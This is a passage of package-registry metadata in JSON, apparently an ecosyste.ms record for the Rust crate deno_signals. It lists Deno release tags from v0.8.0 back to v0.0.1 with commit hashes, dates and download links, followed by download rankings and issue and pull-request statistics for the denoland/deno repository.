parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T16:31:16.662Z","dependent_packages_count":0,"downloads":98651,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":94.71074800844977,"dependent_repos_count":20.954417042070702,"dependent_packages_count":27.748339314346797,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":47.804501454955755},"purl":"pkg:cargo/deno_signals","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_signals","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_signals","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_signals/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k